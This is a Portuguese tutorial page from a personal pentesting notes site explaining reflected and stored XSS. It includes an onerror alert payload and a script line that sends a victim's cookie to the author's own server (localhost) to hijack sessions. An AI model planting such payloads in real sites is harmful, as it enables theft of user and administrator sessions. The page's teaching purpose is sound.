🧙‍♂️
nico
  • Design Patterns
    • Factory Method
  • Javascript
    • Como rodar um código JS?
    • Comentários
    • Variáveis
    • Tipos
    • Conversão de tipos
    • Literais
    • Estruturas de Repetição
    • Declaração Condicional
    • Tratamento de Erros
    • Operadores
    • Functions
    • Classes
    • Classes Importantes
    • Programação Assíncrona
    • Módulos
  • Git
    • Básico
    • Branches
    • Listando repositórios remotos e arquivos de configuração
    • Commits
    • Stash
    • Logs
    • Tags
    • Reset e Revert
    • Checkout, Rm e clean
    • Merge
    • Fetch e Pull
    • Show
  • Segurança da Informação
    • Swiss Army Knife
      • Utilitários
    • Information Gathering - Business
      • Métodos de coleta de informações
    • Information Gathering - Business
    • Information Gathering - INFRA
      • Métodos de coletas de informações
    • Information Gathering - Web
      • Métodos de coleta de informações
    • Scanning
      • Tracking the route
      • Firewall
      • Ping Sweep
      • Identificado hosts ativos em uma rede interna utilizando o ARP
      • Nmap: the network mapper
      • Network Sweeping
    • Burlando mecanismos de defesa
      • Bypass Firewall
      • IDS - Intrusion Detection System
      • IPS - Intrusion Prevention System / Bloqueio de Port Scanning
      • Bypass IDS/IPS/FW
    • Enumeration
      • Enumerando HTTP
      • Enumerando HTTPS
      • Identificando WAF - Web Application Firewall
      • Enumerando FTP
      • Enumerando NetBIOS / SMB
      • Enumerando com RPC
      • Automatizando a enumeração NetBIOS/SMB
      • Enumerando POP3
      • Enumerando SMTP
      • Enumerando SSH
      • Enumerando NFS
      • Enumerando SNMP
      • Enumerando MySQL
    • Hashes e Senhas - Linux
      • Entendendo os Hashes
      • Senhas em sistemas Linux
    • Hashes e Senhas - Windows
      • Introdução
      • Obtendo hashes em sistemas modernos
      • Obtendo hashes em servidores AD
      • Descobrindo hashes
      • Obtendo hashes e senhas em cache
      • Validando as credenciais obtidas
      • Obtendo hashes remotamente
      • Obtendo shell no host
      • Pass the Hash
      • Swiss Army Knife
      • Ataque: NBT-NS / LLMNR
    • Pentest Interno
      • Introdução
      • Identificando o escopo na rede.
      • Capturando hashes
      • Validando as credenciais
      • Enumerando as contas do AD
      • Conseguindo domain admin
    • Brute force: Ataques em senhas
      • Wordlists
    • Pentest Web
      • Identificando métodos aceitos
      • Open redirect
      • SQL Injection
      • Full Path Disclosure | Path Traversal or Directory Traversal
      • LFI - Local File Inclusion
      • HTML Injection
      • XSS - Cross Site Scripting
      • Command Injection
      • Bypass upload
    • Buffer Overflow
      • Arquitetura de computadores
      • Introdução
    • Pós exploração
      • Diferença de shells
      • Transferência de arquivos
      • Tunelamento
      • Enumeração Host: Windows
      • Privilégios e Mecanismos de Integridade
      • Bypass UAC
      • Enumeração Host: Linux
  • Docker
    • O que é docker?
    • Criação e edição de containers
    • Criação de imagens
    • Docker compose
  • Backend
    • Gerenciamento de memória
    • Concorrência e paralelismo
  • Data Structures & Alhorithms
    • Binary Search
Powered by GitBook
On this page
  • Reflected XSS
  • Stored XSS

Was this helpful?

  1. Segurança da Informação
  2. Pentest Web

XSS - Cross Site Scripting

PreviousHTML InjectionNextCommand Injection

Last updated 3 years ago

Was this helpful?

O XSS é uma vulnerabilidade que basicamente permite inserir um código javascript do lado do usuário. Existem três tipos, são eles: reflected XSS, stored XSS e DOM-based XSS. É utilizado junto com a engenharia social para causar impacto, já que a ideia dessa falha é executar um javascript malicioso no navegador da vítima.

Reflected XSS

Esse é o tipo de XSS mais simples e de menor impacto, como o próprio nome diz, ele apenas reflete o script quando for executado. Como no exemplo anterior, vamos supor que a aplicação possui uma entrada que permite passar um valor por parâmetro e exibe na tela esse valor.

Como esse parâmetro não é tratado com algum filtro corretamente no backend, a aplicação permite executar um código javascript que vai refletir para o usuário.

No exemplo a cima executamos apenas um alert para exibir algum valor na tela, mas poderia ser qualquer outro código que iria funcionar também. Podemos facilmente utilizar o javascript para redirecionar para outra página também, vai de acordo com a criatividade.

Podemos ver com mais detalhes no código fonte como que funciona essa falha.

Nesse exemplo, a aplicação exibe o resultado da busca "a" e exibe os usuários. Se for passado o mesmo javascript anterior, irá exibir um alert normalmente.

Olhando no código fonte, podemos ver claramente que a aplicação aceitou normalmente o script que injetamos e por isso foi executado como se fosse um código normal dela. Em alguns casos, é necessário fechar a tag anterior com "> e inserir o script para que funcione. Existem diversos payloads que faz um bypass desses filtros que tratam essas injeções.

Stored XSS

O XSS armazenado, é de longe o que mais causa impacto para o usuário. Vamos imaginar que uma aplicação tem alguma parte que salva informações e as exiba, como por exemplo em campos de comentários, alguma tabela de usuários, etc. Se essa parte for vulnerável a XSS, o script malicioso que for injetado irá ficar salvo no banco de dados, e consequentemente irá ficar salvo nessa página que existir a falha. Sendo assim, toda vez que o usuário for entrar nessa página, irá ser executado esse script malicioso e com isso ele se torna persistente. Um dos impactos que essa vulnerabilidade possibilita, é usar um javascript que irá enviar o cookie do usuário que estiver na sessão logada para algum servidor nosso que armazena esse cookie para podermos utilizar e consequentemente logar na conta do mesmo. Lembrando que é necessário que o usuário entre nessa página que contém esse javascript. Com isso se algum administrador logado entrar nessa página, conseguimos roubar a sessão dele.

Para fazer um teste, vamos utilizar o seguinte script. Ele irá chamar uma imagem com nome de "x" e consequentemente como ela não existe irá trigar um error executando um alert.

<img src=x onerror=alert(document.cookie)>

Ao entrar na página, ele irá executar e nos mostrar o nosso cookie.

Se olharmos no banco de dados, podemos ver que a informação foi armazenada, assim será exibido toda vez que essa página for carregada.

Se quisermos que o usuário seja redirecionado para um servidor e pegarmos o cookie dele, podemos fazer da seguinte forma:

<script>document.location="http://localhost:8080/?"+document.cookie</script>

Para isso, eu subi um servidor local e ao acessar a página conseguimos pegar o cookie e consequentemente logar com esse usuário.